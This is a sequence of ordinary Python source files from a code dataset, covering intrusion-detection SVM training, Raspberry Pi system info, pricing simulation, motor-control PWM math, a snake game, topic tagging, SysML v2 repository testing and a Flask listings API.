pd\ndata=pd.read_csv(\"training.csv\",header=0,index_col=0)\ndata=data.replace(np.nan,'',regex=True)\nseed=np.loadtxt(\"development-sets-seeds.gz\")\nseeds=seed.reshape(seed.shape[1],seed.shape[0])\ndel seed\ndata=data.as_matrix()\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import roc_auc_score as auc_s\nimport pickle\n#for seed in seeds:\nauc_scores=np.zeros(5)\nk=0\nfor seed in seeds:\n X_train=data[seed==0,:-1]\n Y_train=data[seed==0,-1]\n X_test=data[seed==1,:-1]\n Y_test=data[seed==1,-1]\n vect=pickle.loads(dict_vect)\n X_tr0,X_ts0=vect.transform(X_train[:,0]),vect.transform(X_test[:,0])\n X_tr1,X_ts1=vect.transform(X_train[:,1]),vect.transform(X_test[:,1])\n X_tr=np.concatenate((X_tr0.toarray(),X_tr1.toarray()),axis=1)\n X_ts=np.concatenate((X_ts0.toarray(),X_ts1.toarray()),axis=1)\n Y_tr,Y_ts=np.zeros(len(Y_train)), np.zeros(len(Y_test))\n Y_tr[Y_train==\"Normal\"]=1\n Y_ts[Y_test==\"Normal\"]=1\n Y_tr[Y_train==\"Normal\"]=1\n Y_ts[Y_test==\"Normal\"]=1\n clf=SVC(kernel='rbf',C=1,probability=True)\n scores=cross_val_score(clf,X_tr,Y_tr,cv=5, scoring='f1_macro')\n print(scores)\n clf.fit(X_tr,Y_tr)\n y_pred=clf.predict_proba(X_ts)\n auc_scores[k]=auc_s(Y_ts,y_pred[:,1])\n k+=1\n print(auc_scores)\n ","repo_name":"data-boss/net-int-det","sub_path":"svm_binary.py","file_name":"svm_binary.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"86662512254","text":"import sys\nimport os\nimport subprocess\n\ntry:\n from PySide2.QtCore import *\nexcept ImportError:\n from PyQt5.QtCore import *\nif 'PyQt5' in sys.modules:\n from PyQt5.QtCore import pyqtSignal as Signal, pyqtSlot as Slot\nelse:\n from PySide2.QtCore import Signal, Slot\n\n\ncm4 = subprocess.getoutput(\"cat /proc/cpuinfo | grep 'Revision' | awk '{print $1,$2,$3}'\")\nbuild = subprocess.getoutput('cat /proc/device-tree/hardware')\nrpios = subprocess.getoutput('lsb_release -ds')\nlinux = subprocess.getoutput('uname -r')\neth = os.popen('ip addr show eth0 | grep \"\\\" | awk \\'{ print $2 }\\' | awk -F \"/\" \\'{ print $1 }\\'').read().strip()\nwifi = os.popen('ip addr show wlan0 | grep \"\\\" | awk \\'{ print $2 }\\' | awk -F \"/\" \\'{ print $1 }\\'').read().strip()\n\nif wifi == '':\n wifi = 'Not connected to WiFi'\nelse:\n wifi = wifi\n\nif eth == '':\n eth = 'Not connected to Ethernet'\nelse:\n eth = eth\n\nclass Systeminfo(QThread):\n SystemSignal = Signal(str,str,str,str,str,str)\n def __init__(self):\n super().__init__()\n \n def run(self):\n Compute = cm4\n Retermial = build\n Version = rpios\n Kernel = linux\n Ethernet = eth\n Wifi = wifi\n self.sleep(1)\n self.SystemSignal.emit(Compute,Retermial,Version,Kernel,Ethernet,Wifi)","repo_name":"Seeed-Studio/Seeed_Python_ReTerminalQt5Examples","sub_path":"src/SystemInfo.py","file_name":"SystemInfo.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"77"} +{"seq_id":"70446123770","text":"import copy\nimport numpy as np\nimport sys\nfrom copy import deepcopy as cdc\nfrom P1_Base.Classes_base import Hyperparameters, Daily_Website\n\n# SIMULATORE CON:\n# -conversion rates\n# -alpha\n# -n.ro acquisti\n# -transition prob.\n\n\ndef profit_puller(prices, env: Hyperparameters, n_users_pt, tr_prob) -> float:\n\n env_daily = Daily_Website(env, cdc(prices))\n env_daily.n_users = [n_users_pt, n_users_pt, n_users_pt]\n env_daily.alphas = np.array(env.dir_params, dtype=float)/np.sum(env.dir_params)\n\n # tran_prob = (MC_daily.transition_prob[0]+MC_daily.transition_prob[1]+MC_daily.transition_prob[2])/3\n tran_prob = tr_prob\n alphas = (env_daily.alphas[0] + env_daily.alphas[1] + env_daily.alphas[2]) / 3\n conv_rate = np.mean(env_daily.conversion_rates, axis=0)\n\n connectivity = np.zeros(shape=(5, 2), dtype=int)\n for i in range(5):\n connectivity[i, :] = np.array(np.where(tran_prob[i, :] > 0))\n\n pur_prob = np.zeros(5, dtype=float)\n\n all_prods = np.array([0, 1, 2, 3, 4])\n\n for p1 in range(5):\n visited = np.array([p1])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain = np.zeros(5, dtype=float)\n\n click_in_chain[p1] = conv_rate[p1]\n prob_per_p1 = np.zeros(5, dtype=float)\n\n for p2 in np.intersect1d(connectivity[p1], to_visit):\n visited = np.array([p1, p2])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p2] = conv_rate[p2]*tran_prob[p1, p2]*click_in_chain[p1]*(1-prob_per_p1[p2])\n prob_per_p1[p2] += click_in_chain[p2]\n\n for p3 in np.intersect1d(connectivity[p2], to_visit):\n visited = np.array([p1, p2, p3])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p3] = conv_rate[p3]*tran_prob[p2, p3]*click_in_chain[p2]*(1-prob_per_p1[p3])\n prob_per_p1[p3] += click_in_chain[p3]\n\n for p4 in np.intersect1d(connectivity[p3], to_visit):\n visited = np.array([p1, p2, p3, p4])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p4] = conv_rate[p4]*tran_prob[p3, p4]*click_in_chain[p3]*(1-prob_per_p1[p4])\n prob_per_p1[p4] += click_in_chain[p4]\n\n for p5 in np.intersect1d(connectivity[p4], to_visit):\n\n prob_per_p1[p5] += conv_rate[p5]*tran_prob[p4, p5]*click_in_chain[p4]*(1 - prob_per_p1[p5])\n\n prob_per_p1[p1] = conv_rate[p1]\n pur_prob += prob_per_p1*alphas[p1+1]\n profit = float(np.sum(pur_prob*env_daily.margin*(1.0 + env.mepp)))\n\n return profit\n\n\ndef pull_prices(env: Hyperparameters, conv_rates, alpha, n_buy, trans_prob, n_users_pt=100, print_message=\"Simulating\")\\\n -> np.array:\n conv_rate = cdc(conv_rates)\n tran_prob = cdc(trans_prob)\n envv = cdc(env)\n if len(conv_rate) != 3: # SE SONO PASSATI GLI STIMATORI E NON QUELLI VERI\n for i in range(5):\n for j in range(4):\n if (conv_rate[i][j] > 1) or (np.isinf(conv_rate[i][j])):\n conv_rate[i][j] = 1\n\n if len(tran_prob) != 3: # SE SONO PASSATI GLI STIMATORI E NON QUELLI VERI\n for i in range(5):\n for j in range(5):\n if (tran_prob[i][j] > 1) or (np.isinf(tran_prob[i][j])):\n tran_prob[i][j] = 1\n\n if len(conv_rate) != 3: # if I am in the case with one class only\n conv_rate = [conv_rate for _ in range(3)]\n if len(tran_prob) != 3:\n tran_prob = [tran_prob for _ in range(3)]\n if len(alpha) != 3:\n alpha = [alpha for _ in range(3)]\n\n env = Hyperparameters(tran_prob, alpha, envv.pois_param, conv_rate, envv.global_margin, n_buy)\n\n tr_prob = (tran_prob[0]+tran_prob[1]+tran_prob[2])/3\n\n count = 0\n cc = 4**5\n prices = [-1*np.ones(5) for _ in range(cc)]\n profits = np.zeros(cc, dtype=int)\n\n sim_prices = np.zeros(5, dtype=int)\n\n for p1 in range(4):\n sim_prices[0] = p1\n for p2 in range(4):\n sim_prices[1] = p2\n for p3 in range(4):\n sim_prices[2] = p3\n for p4 in range(4):\n sim_prices[3] = p4\n for p5 in range(4):\n sim_prices[4] = p5\n profits[count] = profit_puller(sim_prices, cdc(env), n_users_pt, tr_prob)\n prices[count] = cdc(sim_prices)\n\n count += 1\n sys.stdout.write('\\r' + print_message + str(\", pulling prices: \") + f'{count * 100 / cc} %')\n\n profits = np.array(profits, dtype=float)\n best = np.argmax(profits)\n return prices[best]\n","repo_name":"carloghiglione/HOLA_project","sub_path":"utils/old_structures&data/Price_puller.py","file_name":"Price_puller.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"43730369068","text":"from math import sqrt, pi, atan2\n\n\nclass SVPWM:\n Vi= [\n [0, 0],\n [-1.0/3.0, -sqrt(3) / 3.0],\n [-1.0/3.0, sqrt(3) / 3.0],\n [-2.0 / 3.0, 0.0],\n [2.0 / 3.0, 0.0],\n [1.0 / 3.0, -sqrt(3) / 3.0],\n [1.0 / 3.0, sqrt(3) / 3.0],\n [0, 0]\n ]\n swt = [[0, 0, 0],\n [0, 0, 1],\n [0, 1, 0],\n [0, 1, 1],\n [1, 0, 0],\n [1, 0, 1],\n [1, 1, 0],\n [1, 1, 1]]\n def __init__(self, vdc, tupdate):\n self.Vdc = vdc\n self.T_update = tupdate\n\n def getDC(self, Vref):\n assert(sqrt(Vref[0]**2 + Vref[1]**2) <= self.Vdc * sqrt(3)/3)\n\n theta = atan2(Vref[1], Vref[0]) * 180.0 / pi\n Vl = []\n Vr = []\n swl = []\n swr = []\n\n if theta >=0 and theta <=60:\n s = 1\n Vl = SVPWM.Vi[6].copy()\n Vr = SVPWM.Vi[4].copy()\n swl =SVPWM.swt[6].copy()\n swr = SVPWM.swt[4].copy()\n elif theta >=60 and theta <=120:\n s = 2\n Vl = SVPWM.Vi[2].copy()\n Vr = SVPWM.Vi[6].copy()\n swl = SVPWM.swt[2].copy()\n swr = SVPWM.swt[6].copy()\n elif theta >=120 and theta <=180:\n s = 3\n Vl = SVPWM.Vi[3].copy()\n Vr = SVPWM.Vi[2].copy()\n swl = SVPWM.swt[3].copy()\n swr = SVPWM.swt[2].copy()\n elif theta >=-180 and theta <=-120:\n s = 4\n Vl = SVPWM.Vi[1].copy()\n Vr = SVPWM.Vi[3].copy()\n swl = SVPWM.swt[1].copy()\n swr = SVPWM.swt[3].copy()\n elif theta >=-120 and theta <=-60:\n s = 5\n Vl = SVPWM.Vi[5].copy()\n Vr = SVPWM.Vi[1].copy()\n swl = SVPWM.swt[5].copy()\n swr = SVPWM.swt[1].copy()\n else:\n s=6\n Vl = SVPWM.Vi[4].copy()\n Vr = SVPWM.Vi[5].copy()\n swl = SVPWM.swt[4].copy()\n swr = SVPWM.swt[5].copy()\n\n A = [\n [Vl[0]*self.Vdc, Vr[0]*self.Vdc],\n [Vl[1]*self.Vdc, Vr[1]*self.Vdc]\n ]\n\n detA = A[0][0]*A[1][1] - A[1][0]*A[0][1]\n invA = [\n [A[1][1] / detA, -A[0][1] / detA],\n [-A[1][0] / detA, A[0][0] / detA]\n ]\n b = [self.T_update * Vref[0], self.T_update * Vref[1]]\n\n T = [\n invA[0][0] * b[0] + invA[0][1] * b[1],\n invA[1][0] * b[0] + invA[1][1] * b[1]\n ]\n Toff = self.T_update - T[0] - T[1]\n\n dc = [\n 1/self.T_update *(swl[0] * T[0] + swr[0] * T[1] + Toff / 2.0),\n 1/self.T_update *(swl[1] * T[0] + swr[1] * T[1] + Toff / 2.0),\n 1/self.T_update *(swl[2] * T[0] + swr[2] * T[1] + Toff / 2.0),\n ]\n\n return dc\n","repo_name":"gadokrisztian/stm-svpwm","sub_path":"python/svpwm.py","file_name":"svpwm.py","file_ext":"py","file_size_in_byte":2790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"36292268853","text":"import pygame\nimport time\nimport random\n\n# Define colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nBLUE = (0, 0, 255)\n\n# Set the window size\nWINDOW_WIDTH = 500\nWINDOW_HEIGHT = 500\n\n# Set the block size\nBLOCK_SIZE = 10\n\n# Set the FPS\nFPS = 30\n\n# Initialize Pygame\npygame.init()\n\n# Set the font for the score\nFONT = pygame.font.SysFont(\"comicsansms\", 30)\n\n# Set the caption for the window\npygame.display.set_caption(\"Snake Game\")\n\n# Create the game window\ngame_window = pygame.display.set_mode((WINDOW_WIDTH, WINDOW_HEIGHT))\n\n# Set the clock\nclock = pygame.time.Clock()\n\ndef draw_snake(snake_block_size, snake_list):\n \"\"\"Draws the snake on the screen.\"\"\"\n for x in snake_list:\n pygame.draw.rect(game_window, GREEN, [x[0], x[1], snake_block_size, snake_block_size])\n\ndef display_score(score):\n \"\"\"Displays the player's score on the screen.\"\"\"\n text = FONT.render(\"Score: \" + str(score), True, WHITE)\n game_window.blit(text, [0, 0])\n\ndef game_loop():\n \"\"\"Main game loop.\"\"\"\n # Set the initial position of the snake\n x = WINDOW_WIDTH / 2\n y = WINDOW_HEIGHT / 2\n \n # Set the initial change in position\n x_change = 0\n y_change = 0\n\n # Set the initial snake length\n snake_list = []\n snake_length = 1\n\n # Set the initial food position\n food_x = round(random.randrange(0, WINDOW_WIDTH - BLOCK_SIZE) / 10.0) * 10.0\n food_y = round(random.randrange(0, WINDOW_HEIGHT - BLOCK_SIZE) / 10.0) * 10.0\n\n # Set the initial score\n score = 0\n\n # Set the game over flag\n game_over = False\n\n while not game_over:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n x_change = -BLOCK_SIZE\n y_change = 0\n elif event.key == pygame.K_RIGHT:\n x_change = BLOCK_SIZE\n y_change = 0\n elif event.key == pygame.K_UP:\n x_change = 0\n y_change = -BLOCK_SIZE\n elif event.key == pygame.K_DOWN:\n x_change = 0\n y_change = BLOCK_SIZE\n\n # Move the snake\n x += x_change\n y += y_change\n\n # Check for collision with the window boundaries\n if x >= WINDOW_WIDTH or x < 0 or y >= WINDOW_HEIGHT or y < 0:\n game_over = True\n\n # Create a new food block if the snake eats the old one\n if x == food_x and y == food_y:\n food_x = round(random.randrange(0, WINDOW_WIDTH - BLOCK_SIZE) / 10.0) * 10.0\n food_y = round(random.randrange(0, WINDOW_HEIGHT - BLOCK_SIZE) / 10.0) * 10.0\n snake_length += 1\n score += 10\n # Create the snake head\n snake_head = []\n snake_head.append(x)\n snake_head.append(y)\n snake_list.append(snake_head)\n\n # Remove the old blocks in the snake\n if len(snake_list) > snake_length:\n del snake_list[0]\n\n # Check for collision with the snake itself\n for block in snake_list[:-1]:\n if block == snake_head:\n game_over = True\n\n # Draw the background and the food block\n game_window.fill(BLACK)\n pygame.draw.rect(game_window, RED, [food_x, food_y, BLOCK_SIZE, BLOCK_SIZE])\n\n # Draw the snake on the screen\n draw_snake(BLOCK_SIZE, snake_list)\n\n # Display the player's score on the screen\n display_score(score)\n\n # Update the game window\n pygame.display.update()\n\n # Set the FPS\n clock.tick(FPS)\n\n # Quit Pygame\n pygame.quit()\n\n # Quit the program\n quit()\n\n# Call the game loop function\ngame_loop()","repo_name":"Ayberkr/snake","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3924523669","text":"from sklearn.externals import joblib\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom databaseUtils import *\nimport numpy as np\nfrom time import time\n\ndb = DataUtils()\n\ndef top1words(tfidf_fit_transform, features_names):\n \"\"\"\n 返回tfidf词汇,按照下标对应就可以\n :param tfidf_fit_transform: tfidf矩阵\n :param features_names: 特征词\n :return: list\n \"\"\"\n top1wordsLst = []\n for i in range(0, tfidf_fit_transform.shape[0]):\n index = np.argmax(tfidf_fit_transform[i].toarray())\n top1wordsLst.append(features_names[index])\n return top1wordsLst\n\n\ndef topicWords_extract(institution_teacher):\n \"\"\"\n 从topiclda里面把topicwords提取出来,每个学院作为一个corpus进行处理\n :param institution_teacher: 学院名\n :return: list\n \"\"\"\n corpus = []\n sql = \"\"\"select topicwords_institution from topiclda where institution_teacher = '%s'\"\"\" % institution_teacher\n result = db.select_all(sql)\n for index, tuple in enumerate(result):\n corpus.append(tuple[0])\n return corpus\n\ndef tfidf_words(corpus):\n \"\"\"\n 对topiclda进行矩阵化\n :param corpus:\n :return:\n \"\"\"\n tfidfVectorizer = TfidfVectorizer()\n tfidf_fit = tfidfVectorizer.fit(corpus)\n tfidf_fit_transform = tfidfVectorizer.fit_transform(corpus)\n features_names = tfidf_fit.get_feature_names()\n return tfidf_fit_transform, features_names\n\ndef topicTag_insert(top1wordsLst, institution_teacher):\n \"\"\"\n 把标签插入到指定列\n :param top1wordsLst: 标签列表\n :param institution_teacher: 学院名\n :return:\n \"\"\"\n sql_result_topic_paper = \"\"\"select id_paper, topic_paper from doclda where institution_teacher = '%s'\"\"\" % institution_teacher\n result_topic_paper = db.select_all(sql_result_topic_paper)\n\n conn = db.conn()\n cursor = conn.cursor()\n for index in range(0, len(top1wordsLst)):\n\n sql_topiclda = \"\"\"update topiclda set tag_topic = '%s' where institution_teacher = '%s' and topicid_institution = '%s' \"\"\"\\\n %(top1wordsLst[index], institution_teacher, index)\n cursor.execute(sql_topiclda)\n for id_paper, topic_paper in enumerate(result_topic_paper):\n id_paper = int(topic_paper[0])\n topic_paper = int(topic_paper[1])\n sql_doclda = \"\"\"update doclda set tag_topic = '%s' where id_paper = '%s' \"\"\" \\\n % (top1wordsLst[topic_paper], id_paper)\n cursor.execute(sql_doclda)\n conn.commit()\n cursor.close()\n conn.close()\n\ndef test():\n s1 = time()\n corpus = topicWords_extract('哲学系宗教学系')\n s2 = time()\n print('time2-1 = ', s2 - s1)\n tfidf_fit_transform, features_names = tfidf_words(corpus)\n s3 = time()\n print('time3-2 = ', s3 - s2)\n top1wordsLst = top1words(tfidf_fit_transform, features_names)\n s4 = time()\n print('time4-3 = ', s4 - s3)\n topicTag_insert(top1wordsLst, '哲学系宗教学系')\n s5 = time()\n print('time5-4 = ', s5 - s4)\n\ndef main():\n institutionLst = joblib.load('institutionDoclda.pkl')\n for institution_teacher in institutionLst:\n start = time()\n corpus = topicWords_extract(institution_teacher)\n tfidf_fit_transform, features_names = tfidf_words(corpus)\n top1wordsLst = top1words(tfidf_fit_transform, features_names)\n topicTag_insert(top1wordsLst, institution_teacher)\n print('%s', institution_teacher, ' time ->', time() - start)\nif __name__ == '__main__':\n start = time()\n main()\n # test()\n print('time used -> ', time() -start)\n pass\n","repo_name":"ischenrui/eds","sub_path":"algorithm/lda&w2c/tagTopic.py","file_name":"tagTopic.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12551999343","text":"import sys\nimport os\nimport platform\nimport requests \nimport json\n \ndef DumpJupyterNotebook(cWorkingFolderAndOutputFile, cWorkingFolderAndInputFile, cSysMLString):\n cNotebookFile = cWorkingFolderAndOutputFile\n FID1=open(cWorkingFolderAndInputFile,'r');\n FID2=open(cNotebookFile,'w');\n for tline in FID1:\n num = tline.find('\"\"')\n if num > -1:\n cCommaBlankAndQuotationMark=',' + '\\r\\n' + ' \"'\n cCodedSysML=' \"' + cSysMLString.replace('\\r\\n','\\\\n\"' + cCommaBlankAndQuotationMark) \n #Remove final comma, blank and quotation mark \n cCodedSysML = cCodedSysML[:(len(cCodedSysML)-len(cCommaBlankAndQuotationMark))]\n FID2.write(cCodedSysML )\n else:\n FID2.write(tline)\n FID1.close()\n FID2.close()\n return cNotebookFile \n\n\n\ncServerName=\"http://localhost:9000\"\n\nprint(cServerName)\n\nprint('Complexity;NumFlowsInput;NumFlowsRead;Len')\n\n\nfor iComplexity in range(2):\n iNumActivities = 3\n while iNumActivities < 10:\n iNumActivities = iNumActivities + 1\n for iNumExperiment in range(10):\n SysMLstring =''\n\n clActivities = []\n clFlows = []\n clItems = []\n if iComplexity > 0:\n for iCount in (range(iNumActivities-1)):\n cItem = 'item' + str(iCount)\n clItems.append(cItem) \n SysMLstring = SysMLstring + 'item def ' + cItem + ';\\r\\n'\n \n SysMLstring = SysMLstring + 'package UseCaseActivities{'\n for iCount in (range(iNumActivities)):\n clActivities.append('Act' + str(iCount))\n clFlows.append('flow' + str(iCount))\n for iCount in (range(iNumActivities)):\n cAct = clActivities[iCount]\n cFlow = clFlows[iCount]\n SysMLstring = SysMLstring + '\\r\\n action def ' + cAct + '{'\n if iCount > 0:\n SysMLstring = SysMLstring + '\\r\\n in ' + clFlows[iCount-1] + ';'\n if iCount < len(clFlows)-1:\n SysMLstring = SysMLstring + '\\r\\n out ' + clFlows[iCount] + ';'\n SysMLstring = SysMLstring + '\\r\\n }'\n SysMLstring = SysMLstring + '\\r\\n action def ' + 'OverallUseCase' + ' {'\n for iCount in (range(iNumActivities)):\n cAct = clActivities[iCount]\n SysMLstring = SysMLstring + '\\r\\n action ' + cAct.lower() + ':' +cAct + ';'\n \n for iCount in (range(iNumActivities-1)):\n if iComplexity == 0:\n SysMLstring = SysMLstring + '\\r\\n flow from ' + clActivities[iCount].lower() + '.' + clFlows[iCount] + ' to ' + clActivities[iCount+1].lower() + '.' + clFlows[iCount] + ';'\n else:\n SysMLstring = SysMLstring + '\\r\\n flow of ' + clItems[iCount] + ' from ' + clActivities[iCount].lower() + '.' + clFlows[iCount] + ' to ' + clActivities[iCount+1].lower() + '.' + clFlows[iCount] + ';'\n \n SysMLstring = SysMLstring + '\\r\\n }'\n SysMLstring = SysMLstring + '\\r\\n}'\n \n SysMLstring = SysMLstring + '\\r\\n'\n\n \n #print(SysMLstring)\n \n\n cWorkingFolder=''\n cNotebookFile = cWorkingFolder + 'temp_fas_input_writer.ipynb' \n FID =open(cNotebookFile ,'w');\n FID.write('{\\n \"cells\": [\\n {\\n \"cell_type\": \"markdown\",\\n \"id\": \"237f75ac\",\\n \"metadata\": {},\\n \"source\": [\\n \"FAS for SysMLv2: FAS Input to Repository Writer\\\\n\",\\n \"==\"\\n ]\\n },\\n {\\n \"cell_type\": \"code\",\\n \"execution_count\": null,\\n \"id\": \"f4fe084d\",\\n \"metadata\": {},\\n \"outputs\": [],\\n \"source\": [\\n \"\"\\n ]\\n },\\n {\\n \"cell_type\": \"code\",\\n \"execution_count\": null,\\n \"id\": \"7e04e6fc\",\\n \"metadata\": {},\\n \"outputs\": [],\\n \"source\": [\\n \"%publish UseCaseActivities\"\\n ]\\n }\\n ],\\n \"metadata\": {\\n \"kernelspec\": {\\n \"display_name\": \"SysML\",\\n \"language\": \"sysml\",\\n \"name\": \"sysml\"\\n },\\n \"language_info\": {\\n \"codemirror_mode\": \"sysml\",\\n \"file_extension\": \".sysml\",\\n \"mimetype\": \"text/x-sysml\",\\n \"name\": \"SysML\",\\n \"pygments_lexer\": \"java\",\\n \"version\": \"1.0.0\"\\n }\\n },\\n \"nbformat\": 4,\\n \"nbformat_minor\": 5\\n}\\n')\n FID.close()\n\n cOutputFile = cWorkingFolder + 'temp_output.ipynb'\n cResultFile = cWorkingFolder + 'temp_result.ipynb'\n\n DumpJupyterNotebook(cOutputFile, cNotebookFile, SysMLstring)\n\n\n\n if platform.system()!='Windows':\n cSilencer='2>/dev/null'\n os.system('jupyter nbconvert --to notebook --execute ' + cOutputFile + ' --stdout >' + cResultFile + ' ' + cSilencer)\n else:\n cSilencer='>nul 2>&1';\n os.system('jupyter nbconvert --to notebook --execute ' + cOutputFile + ' --output=' + cResultFile + ' ' + cSilencer)\n\n status = ''\n FID1=open(cResultFile ,'r');\n bStdout = False\n bData = False\n bResultExpected = False\n for tline in FID1:\n #print(tline)\n if bResultExpected:\n status = 'STATUS: ' + tline.replace('\\\\n','').replace('\\\\r','').strip()\n break\n if tline.find('\"name\": \"stdout\",')>-1:\n bStdout = True\n if tline.find('\"data\": {')>-1 and bStdout:\n bData = True\n if tline.find('\"text/plain\": [')>-1 and bData:\n bResultExpected = True\n FID1.close()\n #print(status)\n\n targetProjectID = ''\n if status.find('Saved to Project') < 0:\n print('Error in commit to temporary project')\n else:\n posOpeningParenthesis = status.find('(')\n posClosingParenthesis = status.find(')')\n targetProjectID = status[(posOpeningParenthesis+1):posClosingParenthesis]\n\n\n\n\n bSuccess = True\n if len(targetProjectID) > 0:\n cErrorMessage = ''\n cProjectID=targetProjectID\n \n #print('Reading Use Case Activities and Functional Groups from project ' + cProjectID + ' on server ' + cServerName + ' ...')\n \n try:\n response = requests.get(cServerName + \"/projects/\" + cProjectID)\n except requests.exceptions.ConnectionError:\n bSuccess = false\n cErrorMessage = 'Error: Could not connect to server'\n print(cErrorMessage)\n\n \n if bSuccess and str(response)!='':\n bSuccess = False\n cErrorMessage = 'Error: Could not find project on stated host'\n print('Error: Could not find project on stated host')\n\n \n if bSuccess:\n data = response.json()\n oDefaultBranch = data.get('defaultBranch')\n sDefaultBranchId=oDefaultBranch.get('@id')\n \n if str(type(oDefaultBranch)) == \"\":\n bSuccess = False\n cErrorMessage = 'Error: No default branch.'\n print (cErrorMessage)\n \n if bSuccess:\n response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/branches/\" + sDefaultBranchId)\n data = response.json()\n oHeadCommit = data.get('head')\n if str(type(oHeadCommit)) == \"\":\n bSuccess = False\n cErrorMessage = 'Error: No commit found.'\n print (cErrorMessage)\n else:\n sHeadCommit = oHeadCommit.get('@id')\n\n\n if bSuccess:\n response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/commits/\"+sHeadCommit+\"/elements\")\n data = response.json()\n \n\n iCounter = 0\n for response in data:\n\n if response.get(\"@type\") == 'FlowConnectionUsage':\n iCounter = iCounter + 1\n \n \n print(str(iComplexity)+';'+str(iNumActivities-1)+';'+str(iCounter)+';'+str(len(str(data)))) \n\n\n\n\n\n\n\n","repo_name":"GfSE/fas4sysmlv2","sub_path":"src/auxiliary/test_symlv2_repository_read_write.py","file_name":"test_symlv2_repository_read_write.py","file_ext":"py","file_size_in_byte":8751,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"69801211130","text":"from flask import Flask, jsonify, render_template, request\nfrom flask_mongoengine import MongoEngine, MongoEngineSessionInterface, DoesNotExist\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.config['MONGODB_SETTINGS'] = {\n 'db': 'house-hunt',\n}\napp.config['DEBUG_TB_PANELS'] = {\n \"flask_debugtoolbar.panels.versions.VersionDebugPanel\",\n \"flask_debugtoolbar.panels.timer.TimerDebugPanel\",\n \"flask_debugtoolbar.panels.headers.HeaderDebugPanel\",\n \"flask_debugtoolbar.panels.request_vars.RequestVarsDebugPanel\",\n \"flask_debugtoolbar.panels.template.TemplateDebugPanel\",\n \"flask_debugtoolbar.panels.logger.LoggingPanel\",\n \"flask_mongoengine.panels.MongoDebugPanel\",\n}\n\ndb = MongoEngine(app)\napp.session_interface = MongoEngineSessionInterface(db)\ntoolbar = DebugToolbarExtension(app)\n\nclass ForSale(db.Document):\n baths = db.FloatField()\n beds = db.IntField()\n city = db.StringField()\n created = db.DateField()\n garage = db.FloatField()\n href = db.StringField()\n last_update_date = db.DateField()\n lat = db.LongField()\n line = db.StringField()\n list_date = db.DateField()\n listing_id = db.StringField()\n list_price = db.LongField()\n lon = db.LongField()\n name = db.StringField()\n permalink = db.StringField()\n postal_code = db.StringField()\n property_id = db.StringField()\n sold_price = db.LongField()\n sqft = db.IntField()\n state_code = db.StringField()\n status = db.StringField()\n stories = db.IntField()\n sub_type = db.StringField()\n type = db.StringField()\n year_built = db.IntField()\n\nclass Coding(db.Document):\n listing_id = db.StringField()\n value = db.StringField()\n\n@app.route('/', methods=['GET'])\ndef list():\n return render_template('list.html')\n\n@app.route('/api/v1.0/listings/', methods=['GET'])\ndef listings():\n listings = ForSale.objects().all()\n return jsonify({\n \"status\": 200,\n \"data\": listings,\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['GET'])\ndef codings():\n codings = Coding.objects().all()\n return jsonify({\n \"status\": 200,\n \"data\": codings,\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['POST'])\ndef coding_create(listing_id):\n content = request.get_json(silent=True)\n value = content['value']\n\n try:\n existing = Coding.objects.get(listing_id=listing_id)\n return jsonify({\n \"status\": 500,\n \"data\": None,\n \"errors\": [\"Coding already exists for listing\"],\n }), 500\n except DoesNotExist:\n pass\n\n coding = Coding(listing_id=listing_id, value=value)\n coding.save()\n\n return jsonify({\n \"status\": 200,\n \"data\": {\n \"listing_id\": listing_id,\n \"value\": value,\n },\n \"errors\": [],\n }), 200\n\n@app.route('/api/v1.0/codings/', methods=['GET'])\ndef coding_read(listing_id):\n try:\n coding = Coding.objects.get(listing_id=listing_id)\n return jsonify({\n \"status\": 200,\n \"data\": coding,\n \"errors\": [],\n }), 200\n except DoesNotExist:\n return jsonify({\n \"status\": 404,\n \"data\": None,\n \"errors\": [\"Coding not found for listing\"],\n }), 404\n\n@app.route('/api/v1.0/codings/', methods=['PUT'])\ndef coding_update(listing_id):\n content = request.get_json(silent=True)\n value = content['value']\n\n try:\n coding = Coding.objects.get(listing_id=listing_id)\n coding.update(\n set__value = value,\n )\n\n return jsonify({\n \"status\": 200,\n \"data\": coding,\n \"errors\": [],\n }), 200\n\n except DoesNotExist:\n return jsonify({\n \"status\": 404,\n \"data\": None,\n \"errors\": [\"Coding not found for listing\"],\n }), 404\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"aaronogan/house-hunt","sub_path":"viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9470838304","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\n# tmdb_5000_movies.csv\n\n\n# In[3]:\n\n\nimport pandas as 